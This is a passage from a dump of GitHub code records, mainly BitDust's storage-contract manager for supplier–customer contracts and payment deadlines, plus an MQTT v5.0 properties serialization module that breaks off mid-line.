barrack.tag))\n","repo_name":"marcocspc/URNAI-Tools","sub_path":"urnai/agents/actions/scenarios/rts/generalization/buildunits.py","file_name":"buildunits.py","file_ext":"py","file_size_in_byte":7031,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"99"} +{"seq_id":"41308664860","text":"_Debug = False\n_DebugLevel = 10\n\n#------------------------------------------------------------------------------\n\nimport os\n\n#------------------------------------------------------------------------------\n\nfrom bitdust.logs import lg\n\nfrom bitdust.lib import utime\nfrom bitdust.lib import strng\nfrom bitdust.lib import jsn\n\nfrom bitdust.system import local_fs\nfrom bitdust.system import bpio\n\nfrom bitdust.main import config\nfrom bitdust.main import settings\nfrom bitdust.main import events\n\nfrom bitdust.crypt import key\n\nfrom bitdust.contacts import contactsdb\n\nfrom bitdust.storage import accounting\n\nfrom bitdust.blockchain import bismuth_wallet\n\nfrom bitdust.userid import id_url\n\n#------------------------------------------------------------------------------\n\n\ndef get_customer_contracts_dir(customer_idurl):\n customer_idurl = id_url.field(customer_idurl)\n customer_contracts_prefix = '{}_{}'.format(\n customer_idurl.username,\n strng.to_text(key.HashSHA(customer_idurl.to_public_key(), hexdigest=True)),\n )\n return os.path.join(settings.ServiceDir('service_supplier_contracts'), customer_contracts_prefix)\n\n\ndef get_current_customer_contract(customer_idurl):\n customer_contracts_dir = get_customer_contracts_dir(customer_idurl)\n if _Debug:\n lg.args(_DebugLevel, c=customer_idurl, path=customer_contracts_dir)\n if not os.path.isdir(customer_contracts_dir):\n bpio._dirs_make(customer_contracts_dir)\n current_customer_contract_path = os.path.join(customer_contracts_dir, 'current')\n if not os.path.isfile(current_customer_contract_path):\n return None\n json_data = jsn.loads_text(local_fs.ReadTextFile(current_customer_contract_path))\n if not json_data:\n return None\n if not accounting.verify_storage_contract(json_data):\n lg.err('current storage contract with %r is not valid' % customer_idurl)\n return None\n return json_data\n\n\ndef is_current_customer_contract_active(customer_idurl):\n current_contract = get_current_customer_contract(customer_idurl)\n if not current_contract:\n return False\n now = utime.utcnow_to_sec1970()\n if now > utime.unpack_time(current_contract['complete_after']):\n return False\n return True\n\n\ndef list_customer_contracts(customer_idurl):\n customer_contracts_dir = get_customer_contracts_dir(customer_idurl)\n if not os.path.isdir(customer_contracts_dir):\n bpio._dirs_make(customer_contracts_dir)\n customer_contracts = {}\n current_contract = None\n latest_contract = None\n latest_contract_state = None\n latest_contract_started_time = -1\n latest_completed_contract = None\n latest_completed_contract_time = -1\n latest_paid_contract = None\n latest_paid_contract_time = -1\n completed_contracts_total_GBH_value = 0\n paid_contracts_total_GBH_value = 0\n for fname in os.listdir(customer_contracts_dir):\n if fname == 'current':\n current_contract = jsn.loads_text(local_fs.ReadTextFile(os.path.join(customer_contracts_dir, 'current')))\n if not accounting.verify_storage_contract(current_contract):\n current_contract = None\n lg.err('current storage contract is invalid')\n continue\n try:\n started_time = int(fname.split('.')[0])\n contract_state = fname.split('.')[1]\n except:\n lg.exc()\n continue\n contract_path = os.path.join(customer_contracts_dir, fname)\n json_data = jsn.loads_text(local_fs.ReadTextFile(contract_path))\n if not accounting.verify_storage_contract(json_data):\n lg.err('invalid storage contract found: %r' % fname)\n continue\n json_data['filename'] = fname\n customer_contracts[started_time] = json_data\n if started_time > latest_contract_started_time:\n latest_contract_started_time = started_time\n latest_contract = json_data\n latest_contract_state = contract_state\n if contract_state == 'completed':\n completed_contracts_total_GBH_value += json_data['value']\n if started_time > latest_completed_contract_time:\n latest_completed_contract = json_data\n elif contract_state == 'cancelled':\n completed_contracts_total_GBH_value += json_data['completed_value']\n elif contract_state == 'paid':\n paid_contracts_total_GBH_value += json_data['value']\n if started_time > latest_paid_contract_time:\n latest_paid_contract = json_data\n else:\n raise Exception('unknown state of the contract')\n customer_contracts['current'] = current_contract\n customer_contracts['latest'] = latest_contract\n customer_contracts['latest_state'] = latest_contract_state\n customer_contracts['latest_paid_contract'] = latest_paid_contract\n customer_contracts['latest_completed_contract'] = latest_completed_contract\n customer_contracts['completed_value'] = completed_contracts_total_GBH_value\n customer_contracts['paid_value'] = paid_contracts_total_GBH_value\n if _Debug:\n lg.args(_DebugLevel, completed_value=completed_contracts_total_GBH_value, paid_value=paid_contracts_total_GBH_value)\n return customer_contracts\n\n\ndef prepare_customer_contract(customer_idurl, details):\n customer_contracts_dir = get_customer_contracts_dir(customer_idurl)\n if _Debug:\n lg.args(_DebugLevel, c=customer_idurl, path=customer_contracts_dir)\n now = utime.utcnow_to_sec1970()\n started_time = now\n if not os.path.isdir(customer_contracts_dir):\n bpio._dirs_make(customer_contracts_dir)\n current_customer_contract_path = os.path.join(customer_contracts_dir, 'current')\n if os.path.isfile(current_customer_contract_path):\n current_contract = jsn.loads_text(local_fs.ReadTextFile(current_customer_contract_path))\n if current_contract:\n if not accounting.verify_storage_contract(current_contract):\n current_contract = None\n lg.err('current storage contract with %r is not valid' % customer_idurl)\n else:\n if now < utime.unpack_time(current_contract['complete_after']):\n # SCENARIO 2: there is already a contract started with this customer and not yet completed\n if _Debug:\n lg.dbg(_DebugLevel, 'valid customer contract with %r already exists' % customer_idurl)\n return change_current_customer_contract(customer_idurl, details)\n # SCENARIO 3,4,6: found that previous contract was active but finished now\n lg.warn('current storage contract with %r already ended' % customer_idurl)\n complete_current_customer_contract(customer_idurl)\n customer_contracts_list_and_details = list_customer_contracts(customer_idurl)\n latest_contract = customer_contracts_list_and_details['latest']\n latest_contract_state = customer_contracts_list_and_details['latest_state']\n latest_paid_contract = customer_contracts_list_and_details['latest_paid_contract']\n latest_completed_contract = customer_contracts_list_and_details['latest_completed_contract']\n completed_value = customer_contracts_list_and_details['completed_value']\n billing_period_seconds = settings.SupplierContractBillingPeriodDays()*24*60*60\n initial_duration_hours = config.conf().getInt('services/supplier-contracts/initial-duration-hours')\n new_raise_factor = config.conf().getFloat('services/supplier-contracts/duration-raise-factor')\n new_duration_hours = None\n if not latest_contract:\n # SCENARIO 1: this is a new customer - there were no contracts signed yet\n started_time = now\n new_duration_hours = initial_duration_hours\n new_pay_before_time = started_time + int(billing_period_seconds/2.0)\n else:\n if latest_contract_state == 'cancelled':\n cancelled_contract_filename = latest_contract.pop('filename', None)\n if now < utime.unpack_time(latest_contract['complete_after']):\n # SCENARIO 15,16,17: latest contract was cancelled, but customer wants to restart it\n try:\n os.remove(os.path.join(customer_contracts_dir, cancelled_contract_filename))\n except:\n lg.exc()\n return start_current_customer_contract(\n customer_idurl=customer_idurl,\n details=details,\n started_time=utime.unpack_time(latest_contract['started']),\n complete_after_time=utime.unpack_time(latest_contract['complete_after']),\n pay_before_time=utime.unpack_time(latest_contract['pay_before']),\n duration_hours=latest_contract['duration_hours'],\n raise_factor=latest_contract['raise_factor'],\n )\n if latest_completed_contract:\n if now - initial_duration_hours*60*60 > utime.unpack_time(latest_completed_contract['pay_before']):\n # SCENARIO 18, 19: latest contract was cancelled and already expired, customer wants to start a new contract\n # other contract was completed, but was not paid\n lg.warn('customer %r yet did not pay for previously completed contract' % customer_idurl)\n return {\n 'deny': True,\n 'reason': 'unpaid',\n 'value': completed_value,\n }\n # SCENARIO 11,13: latest contract was cancelled and already expired, other contracts was completed already\n try:\n os.remove(os.path.join(customer_contracts_dir, cancelled_contract_filename))\n except:\n lg.exc()\n # rename cancelled contract file to \".completed\"\n contract_path_new = os.path.join(customer_contracts_dir, '{}.completed'.format(utime.unpack_time(latest_contract['started'])))\n local_fs.WriteTextFile(contract_path_new, jsn.dumps(latest_contract))\n started_time = now\n new_duration_hours = initial_duration_hours\n new_pay_before_time = utime.unpack_time(latest_completed_contract['pay_before'])\n else:\n if latest_paid_contract:\n # SCENARIO 12: latest contract was cancelled and already expired, other contracts was paid\n try:\n os.remove(os.path.join(customer_contracts_dir, cancelled_contract_filename))\n except:\n lg.exc()\n # rename cancelled contract file to \".completed\"\n contract_path_new = os.path.join(customer_contracts_dir, '{}.completed'.format(utime.unpack_time(latest_contract['started'])))\n local_fs.WriteTextFile(contract_path_new, jsn.dumps(latest_contract))\n started_time = now\n new_duration_hours = initial_duration_hours\n new_pay_before_time = started_time + int(billing_period_seconds/2.0)\n else:\n # SCENARIO 10: latest contract was cancelled and already expired, no other contracts found\n # rename cancelled contract file to \".completed\"\n contract_path_new = os.path.join(customer_contracts_dir, '{}.completed'.format(utime.unpack_time(latest_contract['started'])))\n local_fs.WriteTextFile(contract_path_new, jsn.dumps(latest_contract))\n started_time = now\n new_duration_hours = initial_duration_hours\n new_pay_before_time = started_time + int(billing_period_seconds/2.0)\n else:\n started_time = utime.unpack_time(latest_contract['complete_after'])\n new_duration_hours = int(latest_contract['duration_hours']*latest_contract['raise_factor'])\n if latest_contract_state == 'completed':\n if latest_paid_contract:\n new_pay_before_time = utime.unpack_time(latest_paid_contract['started']) + latest_paid_contract['duration_hours']*60*60 + billing_period_seconds\n if new_pay_before_time < started_time + new_duration_hours*60*60:\n # SCENARIO 9: the previous contract is completed and some contracts already paid, but there is still no trust to this customer\n lg.warn('customer %r paid before, but yet did not pay for previously completed contracts' % customer_idurl)\n return {\n 'deny': True,\n 'reason': 'unpaid',\n 'value': completed_value,\n }\n else:\n # SCENARIO 7: no active contract, the previos contract is completed and there is also a paid contract before\n pass\n else:\n new_pay_before_time = utime.unpack_time(latest_contract['pay_before'])\n if new_pay_before_time < now + new_duration_hours*60*60:\n # SCENARIO 8: the previous contract is completed, but there is no trust to this customer\n lg.warn('customer %r yet did not pay for previously completed contract' % customer_idurl)\n return {\n 'deny': True,\n 'reason': 'unpaid',\n 'value': completed_value,\n }\n else:\n # SCENARIO 5: no active contract, the previos contract is completed but there were no payments yet done\n pass\n elif latest_contract_state == 'paid':\n # SCENARIO 14: currently there is no active contract, but the previos contract is completed and paid\n new_duration_hours = initial_duration_hours\n new_pay_before_time = started_time + billing_period_seconds\n else:\n raise Exception('unexpected contract state: %r' % latest_contract_state)\n return start_current_customer_contract(\n customer_idurl=customer_idurl,\n details=details,\n started_time=started_time,\n complete_after_time=started_time + new_duration_hours*60*60,\n pay_before_time=new_pay_before_time,\n duration_hours=new_duration_hours,\n raise_factor=new_raise_factor,\n )\n\n\ndef start_current_customer_contract(customer_idurl, details, started_time, complete_after_time, pay_before_time, duration_hours, raise_factor):\n json_data = {\n 'started': utime.pack_time(started_time),\n 'complete_after': utime.pack_time(complete_after_time),\n 'pay_before': utime.pack_time(pay_before_time),\n 'value': float(duration_hours)*(details['allocated_bytes']/(1024.0*1024.0*1024.0)),\n 'allocated_bytes': details['allocated_bytes'],\n 'duration_hours': duration_hours,\n 'my_position': details['my_position'],\n 'ecc_map': details['ecc_map'],\n 'raise_factor': raise_factor,\n 'wallet_address': bismuth_wallet.my_wallet_address(),\n }\n local_fs.WriteTextFile(os.path.join(get_customer_contracts_dir(customer_idurl), 'current'), jsn.dumps(json_data))\n json_data['customer'] = customer_idurl\n if _Debug:\n lg.args(_DebugLevel, c=json_data)\n events.send('storage-contract-started', data=dict(contract=json_data))\n return json_data\n\n\ndef cancel_customer_contract(customer_idurl):\n customer_contracts_dir = get_customer_contracts_dir(customer_idurl)\n if _Debug:\n lg.args(_DebugLevel, c=customer_idurl, path=customer_contracts_dir)\n if not os.path.isdir(customer_contracts_dir):\n return False\n current_customer_contract_path = os.path.join(customer_contracts_dir, 'current')\n if not os.path.isfile(current_customer_contract_path):\n return False\n current_contract = jsn.loads_text(local_fs.ReadTextFile(current_customer_contract_path))\n if not current_contract:\n return False\n if not accounting.verify_storage_contract(current_contract):\n lg.err('current contract with %r is not valid' % customer_idurl)\n return False\n cancelled_time = utime.utcnow_to_sec1970()\n completed_duration_hours = (cancelled_time - utime.unpack_time(current_contract['started']))/(60.0*60.0)\n completed_value = float(completed_duration_hours)*(current_contract['allocated_bytes']/(1024.0*1024.0*1024.0))\n current_contract['completed_value'] = completed_value\n current_contract['cancelled'] = utime.pack_time(cancelled_time)\n # rename \"current\" file to \".cancelled\"\n try:\n os.remove(current_customer_contract_path)\n except:\n lg.exc()\n contract_path_new = os.path.join(customer_contracts_dir, '{}.cancelled'.format(utime.unpack_time(current_contract['started'])))\n local_fs.WriteTextFile(contract_path_new, jsn.dumps(current_contract))\n if _Debug:\n lg.args(_DebugLevel, old_path=current_customer_contract_path, new_path=contract_path_new)\n current_contract['customer'] = customer_idurl\n events.send('storage-contract-cancelled', data=dict(contract=current_contract))\n return True\n\n\ndef change_current_customer_contract(customer_idurl, details):\n customer_contracts_dir = get_customer_contracts_dir(customer_idurl)\n if _Debug:\n lg.args(_DebugLevel, c=customer_idurl, path=customer_contracts_dir)\n if not os.path.isdir(customer_contracts_dir):\n bpio._dirs_make(customer_contracts_dir)\n current_customer_contract_path = os.path.join(customer_contracts_dir, 'current')\n if not os.path.isfile(current_customer_contract_path):\n lg.err('current storage contract with %r not found' % customer_idurl)\n return {\n 'deny': True,\n 'reason': 'current storage contract not found',\n }\n current_contract = jsn.loads_text(local_fs.ReadTextFile(current_customer_contract_path))\n if not current_contract:\n lg.err('current storage contract with %r read failed' % customer_idurl)\n return {\n 'deny': True,\n 'reason': 'current storage contract not found',\n }\n if details.get('ecc_map'):\n current_contract['ecc_map'] = details['ecc_map']\n if details.get('my_position') is not None:\n current_contract['my_position'] = details['my_position']\n if details['allocated_bytes'] != current_contract['allocated_bytes']:\n current_value = current_contract['value']\n new_duration_hours = int(current_value/(details['allocated_bytes']/(1024.0*1024.0*1024.0)))\n new_complete_after_time = utime.unpack_time(current_contract['started']) + new_duration_hours*60*60\n if new_complete_after_time > utime.unpack_time(current_contract['pay_before']):\n return {\n 'deny': True,\n 'reason': 'contract duration change limit exceeded',\n }\n current_contract['allocated_bytes'] = details['allocated_bytes']\n current_contract['duration_hours'] = new_duration_hours\n current_contract['complete_after'] = utime.pack_time(new_complete_after_time)\n if _Debug:\n lg.args(_DebugLevel, c=current_contract)\n local_fs.WriteTextFile(current_customer_contract_path, jsn.dumps(current_contract))\n current_contract['customer'] = customer_idurl\n events.send('storage-contract-changed', data=dict(contract=current_contract))\n return current_contract\n\n\ndef complete_current_customer_contract(customer_idurl):\n customer_contracts_dir = get_customer_contracts_dir(customer_idurl)\n if _Debug:\n lg.args(_DebugLevel, c=customer_idurl, path=customer_contracts_dir)\n if not os.path.isdir(customer_contracts_dir):\n bpio._dirs_make(customer_contracts_dir)\n current_customer_contract_path = os.path.join(customer_contracts_dir, 'current')\n if not os.path.isfile(current_customer_contract_path):\n return False\n current_contract = jsn.loads_text(local_fs.ReadTextFile(current_customer_contract_path))\n if not current_contract:\n return False\n if not accounting.verify_storage_contract(current_contract):\n lg.err('current contract with %r is not valid' % customer_idurl)\n return False\n # rename \"current\" file to \".completed\"\n contract_path_new = os.path.join(customer_contracts_dir, '{}.completed'.format(utime.unpack_time(current_contract['started'])))\n if _Debug:\n lg.args(_DebugLevel, old_path=current_customer_contract_path, new_path=contract_path_new)\n os.rename(current_customer_contract_path, contract_path_new)\n current_contract['customer'] = customer_idurl\n events.send('storage-contract-completed', data=dict(contract=current_contract))\n return True\n\n\ndef verify_all_current_customers_contracts():\n rejected_customers = []\n now = utime.utcnow_to_sec1970()\n for customer_idurl in contactsdb.customers():\n contracts_list = list_customer_contracts(customer_idurl)\n latest_contract = contracts_list['latest']\n if contracts_list['current']:\n if now > utime.unpack_time(contracts_list['current']['complete_after']):\n lg.warn('current storage contract with %r already ended' % customer_idurl)\n complete_current_customer_contract(customer_idurl)\n latest_contract = contracts_list['current']\n if not latest_contract:\n rejected_customers.append(customer_idurl)\n lg.warn('rejecting customer %r because of missing contract' % customer_idurl)\n else:\n if latest_contract.get('cancelled'):\n lg.warn('rejecting customer %r because of cancelled contract' % customer_idurl)\n rejected_customers.append(customer_idurl)\n else:\n next_complete_after_time = utime.unpack_time(latest_contract['complete_after']) + latest_contract['raise_factor']*latest_contract['duration_hours']*60*60\n if now > next_complete_after_time:\n lg.warn('rejecting customer %r because of finished contract' % customer_idurl)\n rejected_customers.append(customer_idurl)\n return rejected_customers\n","repo_name":"bitdust-io/public","sub_path":"bitdust/supplier/storage_contract.py","file_name":"storage_contract.py","file_ext":"py","file_size_in_byte":22451,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"99"} +{"seq_id":"26316253854","text":"import struct\nimport sys\n\nfrom .packettypes import PacketTypes\n\n\nclass MQTTException(Exception):\n pass\n\n\nclass MalformedPacket(MQTTException):\n pass\n\n\ndef writeInt16(length):\n # serialize a 16 bit integer to network format\n return bytearray(struct.pack(\"!H\", length))\n\n\ndef readInt16(buf):\n # deserialize a 16 bit integer from network format\n return struct.unpack(\"!H\", buf[:2])[0]\n\n\ndef writeInt32(length):\n # serialize a 32 bit integer to network format\n return bytearray(struct.pack(\"!L\", length))\n\n\ndef readInt32(buf):\n # deserialize a 32 bit integer from network format\n return struct.unpack(\"!L\", buf[:4])[0]\n\n\ndef writeUTF(data):\n # data could be a string, or bytes. If string, encode into bytes with utf-8\n if sys.version_info[0] < 3:\n data = bytearray(data, 'utf-8')\n else:\n data = data if type(data) == type(b\"\") else bytes(data, \"utf-8\")\n return writeInt16(len(data)) + data\n\n\ndef readUTF(buffer, maxlen):\n if maxlen >= 2:\n length = readInt16(buffer)\n else:\n raise MalformedPacket(\"Not enough data to read string length\")\n maxlen -= 2\n if length > maxlen:\n raise MalformedPacket(\"Length delimited string too long\")\n buf = buffer[2:2+length].decode(\"utf-8\")\n # look for chars which are invalid for MQTT\n for c in buf: # look for D800-DFFF in the UTF string\n ord_c = ord(c)\n if ord_c >= 0xD800 and ord_c <= 0xDFFF:\n raise MalformedPacket(\"[MQTT-1.5.4-1] D800-DFFF found in UTF-8 data\")\n if ord_c == 0x00: # look for null in the UTF string\n raise MalformedPacket(\"[MQTT-1.5.4-2] Null found in UTF-8 data\")\n if ord_c == 0xFEFF:\n raise MalformedPacket(\"[MQTT-1.5.4-3] U+FEFF in UTF-8 data\")\n return buf, length+2\n\n\ndef writeBytes(buffer):\n return writeInt16(len(buffer)) + buffer\n\n\ndef readBytes(buffer):\n length = readInt16(buffer)\n return buffer[2:2+length], length+2\n\n\nclass VariableByteIntegers: # Variable Byte Integer\n \"\"\"\n MQTT variable byte integer helper class. Used\n in several places in MQTT v5.0 properties.\n\n \"\"\"\n\n @staticmethod\n def encode(x):\n \"\"\"\n Convert an integer 0 <= x <= 268435455 into multi-byte format.\n Returns the buffer convered from the integer.\n \"\"\"\n assert 0 <= x <= 268435455\n buffer = b''\n while 1:\n digit = x % 128\n x //= 128\n if x > 0:\n digit |= 0x80\n if sys.version_info[0] >= 3:\n buffer += bytes([digit])\n else:\n buffer += bytes(chr(digit))\n if x == 0:\n break\n return buffer\n\n @staticmethod\n def decode(buffer):\n \"\"\"\n Get the value of a multi-byte integer from a buffer\n Return the value, and the number of bytes used.\n\n [MQTT-1.5.5-1] the encoded value MUST use the minimum number of bytes necessary to represent the value\n \"\"\"\n multiplier = 1\n value = 0\n bytes = 0\n while 1:\n bytes += 1\n digit = buffer[0]\n buffer = buffer[1:]\n value += (digit & 127) * multiplier\n if digit & 128 == 0:\n break\n multiplier *= 128\n return (value, bytes)\n\n\nclass Properties(object):\n \"\"\"MQTT v5.0 properties class.\n\n See Properties.names for a list of accepted property names along with their numeric values.\n\n See Properties.properties for the data type of each property.\n\n Example of use:\n\n publish_properties = Properties(PacketTypes.PUBLISH)\n publish_properties.UserProperty = (\"a\", \"2\")\n publish_properties.UserProperty = (\"c\", \"3\")\n\n First the object is created with packet type as argument, no properties will be present at\n this point. Then properties are added as attributes, the name of which is the string property\n name without the spaces.\n\n \"\"\"\n\n def __init__(self, packetType):\n self.packetType = packetType\n self.types = [\"Byte\", \"Two Byte Integer\", \"Four Byte Integer\", \"Variable Byte Integer\",\n \"Binary Data\", \"UTF-8 Encoded String\", \"UTF-8 String Pair\"]\n\n self.names = {\n \"Payload Format Indicator\": 1,\n \"Message Expiry Interval\": 2,\n \"Content Type\": 3,\n \"Response Topic\": 8,\n \"Correlation Data\": 9,\n \"Subscription Identifier\": 11,\n \"Session Expiry Interval\": 17,\n \"Assigned Client Identifier\": 18,\n \"Server Keep Alive\": 19,\n \"Authentication Method\": 21,\n \"Authentication Data\": 22,\n \"Request Problem Information\": 23,\n \"Will Delay Interval\": 24,\n \"Request Response Information\": 25,\n \"Response Information\": 26,\n \"Server Reference\": 28,\n \"Reason String\": 31,\n \"Receive Maximum\": 33,\n \"Topic Alias Maximum\": 34,\n \"Topic Alias\": 35,\n \"Maximum QoS\": 36,\n \"Retain Available\": 37,\n \"User Property\": 38,\n \"Maximum Packet Size\": 39,\n \"Wildcard Subscription Available\": 40,\n \"Subscription Identifier Available\": 41,\n \"Shared Subscription Available\": 42\n }\n\n self.properties = {\n # id: type, packets\n # payload format indicator\n 1: (self.types.index(\"Byte\"), [PacketTypes.PUBLISH, PacketTypes.WILLMESSAGE]),\n 2: (self.types.index(\"Four Byte Integer\"), [PacketTypes.PUBLISH, PacketTypes.WILLMESSAGE]),\n 3: (self.types.index(\"UTF-8 Encoded String\"), [PacketTypes.PUBLISH, PacketTypes.WILLMESSAGE]),\n 8: (self.types.index(\"UTF-8 Encoded String\"), [PacketTypes.PUBLISH, PacketTypes.WILLMESSAGE]),\n 9: (self.types.index(\"Binary Data\"), [PacketTypes.PUBLISH, PacketTypes.WILLMESSAGE]),\n 11: (self.types.index(\"Variable Byte Integer\"),\n [PacketTypes.PUBLISH, PacketTypes.SUBSCRIBE]),\n 17: (self.types.index(\"Four Byte Integer\"),\n [PacketTypes.CONNECT, PacketTypes.CONNACK, PacketTypes.DISCONNECT]),\n 18: (self.types.index(\"UTF-8 Encoded String\"), [PacketTypes.CONNACK]),\n 19: (self.types.index(\"Two Byte Integer\"), [PacketTypes.CONNACK]),\n 21: (self.types.index(\"UTF-8 Encoded String\"),\n [PacketTypes.CONNECT, PacketTypes.CONNACK, PacketTypes.AUTH]),\n 22: (self.types.index(\"Binary Data\"),\n [PacketTypes.CONNECT, PacketTypes.CONNACK, PacketTypes.AUTH]),\n 23: (self.types.index(\"Byte\"),\n [PacketTypes.CONNECT]),\n 24: (self.types.index(\"Four Byte Integer\"), [PacketTypes.WILLMESSAGE]),\n 25: (self.types.index(\"Byte\"), [PacketTypes.CONNECT]),\n 26: (self.types.index(\"UTF-8 Encoded String\"), [PacketTypes.CONNACK]),\n 28: (self.types.index(\"UTF-8 Encoded String\"),\n [PacketTypes.CONNACK, PacketTypes.DISCONNECT]),\n 31: (self.types.index(\"UTF-8 Encoded String\"),\n [PacketTypes.CONNACK, PacketTypes.PUBACK, PacketTypes.PUBREC,\n PacketTypes.PUBREL, PacketTypes.PUBCOMP, PacketTypes.SUBACK,\n PacketTypes.UNSUBACK, PacketTypes.DISCONNECT, PacketTypes.AUTH]),\n 33: (self.types.index(\"Two Byte Integer\"),\n [PacketTypes.CONNECT, PacketTypes.CONNACK]),\n 34: (self.types.index(\"Two Byte Integer\"),\n [PacketTypes.CONNECT, PacketTypes.CONNACK]),\n 35: (self.types.index(\"Two Byte Integer\"), [PacketTypes.PUBLISH]),\n 36: (self.types.index(\"Byte\"), [PacketTypes.CONNACK]),\n 37: (self.types.index(\"Byte\"), [PacketTypes.CONNACK]),\n 38: (self.types.index(\"UTF-8 String Pair\"),\n [PacketTypes.CONNECT, PacketTypes.CONNACK,\n PacketTypes.PUBLISH, PacketTypes.PUBACK,\n PacketTypes.PUBREC, PacketTypes.PUBREL, PacketTypes.PUBCOMP,\n PacketTypes.SUBSCRIBE, PacketTypes.SUBACK,\n PacketTypes.UNSUBSCRIBE, PacketTypes.UNSUBACK,\n PacketTypes.DISCONNECT, PacketTypes.AUTH, PacketTypes.WILLMESSAGE]),\n 39: (self.types.index(\"Four Byte Integer\"),\n [PacketTypes.CONNECT, PacketTypes.CONNACK]),\n 40: (self.types.index(\"Byte\"), [PacketTypes.CONNACK]),\n 41: (self.types.index(\"Byte\"), [PacketTypes.CONNACK]),\n 42: (self.types.index(\"Byte\"), [PacketTypes.CONNACK]),\n }\n\n def allowsMultiple(self, compressedName):\n return self.getIdentFromName(compressedName) in [11, 38]\n\n def getIdentFromName(self, compressedName):\n # return the identifier corresponding to the property name\n result = -1\n for name in self.names.keys():\n if compressedName == name.replace(' ', ''):\n result = self.names[name]\n break\n return result\n\n def __setattr__(self, name, value):\n name = name.replace(' ', '')\n privateVars = [\"packetType\", \"types\", \"names\", \"properties\"]\n if name in privateVars:\n object.__setattr__(self, name, value)\n else:\n # the name could have spaces in, or not. Remove spaces before assignment\n if name not in [aname.replace(' ', '') for aname in self.names.keys()]:\n raise MQTTException(\n \"Property name must be one of \"+str(self.names.keys()))\n # check that this attribute applies to the packet type\n if self.packetType not in self.properties[self.getIdentFromName(name)][1]:\n raise MQTTException(\"Property %s does not apply to packet type %s\"\n % (name, PacketTypes.Names[self.packetType]))\n\n # Check for forbidden values\n if type(value) != type([]):\n if name in [\"ReceiveMaximum\", \"TopicAlias\"] \\\n and (value < 1 or value > 65535):\n\n raise MQTTException(\n \"%s property value must be in the range 1-65535\" % (name))\n elif name in [\"TopicAliasMaximum\"] \\\n and (value < 0 or value > 65535):\n\n raise MQTTException(\n \"%s property value must be in the range 0-65535\" % (name))\n elif name in [\"MaximumPacketSize\", \"SubscriptionIdentifier\"] \\\n and (value < 1 or value > 268435455):\n\n raise MQTTException(\n \"%s property value must be in the range 1-268435455\" % (name))\n elif name in [\"RequestResponseInformation\", \"RequestProblemInformation\", \"PayloadFormatIndicator\"] \\\n and (value != 0 and value != 1):\n\n raise MQTTException(\n \"%s property value must be 0 or 1\" % (name))\n\n if self.allowsMultiple(name):\n if type(value) != type([]):\n value = [value]\n if hasattr(self, name):\n value = object.__getattribute__(self, name) + value\n object.__setattr__(self, name, value)\n\n def __str__(self):\n buffer = \"[\"\n first = True\n for name in self.names.keys():\n compressedName = name.replace(' ', '')\n if hasattr(self, compressedName):\n if not first:\n buffer += \", \"\n buffer += compressedName + \" : \" + \\\n str(getattr(self, compressedName))\n first = False\n buffer += \"]\"\n return buffer\n\n def json(self):\n data = {}\n for name in self.names.keys():\n compressedName = name.replace(' ', '')\n if hasattr(self, compressedName):\n val = getattr(self, compressedName)\n if compressedName == 'CorrelationData' and isinstance(val, bytes):\n data[compressedName] = val.hex()\n else:\n data[compressedName] = val\n return data\n\n def isEmpty(self):\n rc = True\n for name in self.names.keys():\n compressedName = name.replace(' ', '')\n if hasattr(self, compressedName):\n rc = False\n break\n return rc\n\n def clear(self):\n for name in self.names.keys():\n compressedName = name.replace(' ', '')\n if hasattr(self, compressedName):\n delattr(self, compressedName)\n\n def writeProperty(self, identifier, type, value):\n buffer = b\"\"\n buffer += VariableByteIntegers.encode(identifier) # identifier\n if type == self.types.index(\"Byte\"): # value\n if sys.version_info[0] < 3:\n buffer += chr(value)\n else:\n buffer += bytes([value])\n elif type == self.types.index(\"Two Byte Integer\"):\n buffer += writeInt16(value)\n elif type == self.types.index(\"Four Byte Integer\"):\n buffer += writeInt32(value)\n elif type == self.types.index(\"Variable Byte Integer\"):\n buffer += VariableByteIntegers.encode(value)\n elif type == self.types.index(\"Binary Data\"):\n buffer += writeBytes(value)\n elif type == self.types.index(\"UTF-8 Encoded String\"):\n buffer += writeUTF(value)\n elif type == self.types.index(\"UTF-8 String Pair\"):\n buffer += writeUTF(value[0]) + writeUTF(value[1])\n return buffer\n\n def pack(self):\n # serialize properties into buffer for sending over network\n buffer = b\"\"\n for name in self.names.keys():\n compressedName = name.replace(' ', '')\n if hasattr(self, compressedName):\n identifier = self.getIdentFromName(compressedName)\n attr_type = self.properties[identifier][0]\n if self.allowsMultiple(compressedName):\n for prop in getattr(self, compressedName):\n buffer += self.writeProperty(identifier,\n attr_type, prop)\n else:\n buffer += self.writeProperty(identifier, attr_type,\n getattr(self, compressedName))\n return VariableByteIntegers.encode(len(buffer)) + buffer\n\n def readProperty(self, buffer, type, propslen):\n if type == self.types.index(\"Byte\"):\n value = buffer[0]\n valuelen = 1\n elif type == self.types.index(\"Two Byte Integer\"):\n value = readInt16(buffer)\n valuelen = 2\n elif type == self.types.index(\"Four Byte Integer\"):\n value = readInt32(buffer)\n valuelen = 4\n elif type == self.types.index(\"Variable Byte Integer\"):\n value, valuelen = VariableByteIntegers.decode(buffer)\n elif type == self.types.index(\"Binary Data\"):\n value, valuelen = readBytes(buffer)\n elif type == self.types.index(\"UTF-8 Encoded String\"):\n value, valuelen = readUTF(buffer, propslen)\n elif type == self.types.index(\"UTF-8 String Pair\"):\n value, valuelen = readUTF(buffer, propslen)\n buffer = buffer[valuelen:] # strip the bytes used by the value\n value1, valuelen1 = readUTF(buffer, propslen - valuelen)\n value = (value, value1)\n valuelen += valuelen1\n return value, valuelen\n\n def getNameFromIdent(self, identifier):\n rc = None\n for name in self.names:\n if self.names[name] == identifier:\n rc = name\n return rc\n\n def unpack(self, buffer):\n if sys.version_info[0] < 3:\n buffer = bytearray(buffer)\n self.clear()\n # deserialize properties into attributes from buffer received from network\n propslen, VBIlen = VariableByteIntegers.decode(buffer)\n buffer = buffer[VBIlen:] # strip the bytes used by the VBI\n propslenleft = propslen\n while propslenleft > 0: # properties length is 0 if there are none\n identifier, VBIlen2 = VariableByteIntegers.decode(\n buffer) # property identifier\n buffer = buffer[VBIlen2:] # strip the bytes used by the VBI\n propslenleft -= VBIlen2\n attr_type = self.properties[identifier][0]\n value, valuelen = self.readProperty(\n buffer, attr_type, propslenleft)\n buffer = buffer[valuelen:] # strip the bytes used by the value\n propslenleft -= valuelen\n propname = self.getNameFromIdent(identifier)\n compressedName = propname.replace(' ', '')\n if not self.allowsMultiple(compressedName) and hasattr(self, compressedName):\n raise MQTTException(\n \"Property '%s' must not exist more than once\" % property)\n setattr(self, propname, value)\n return self, propslen + 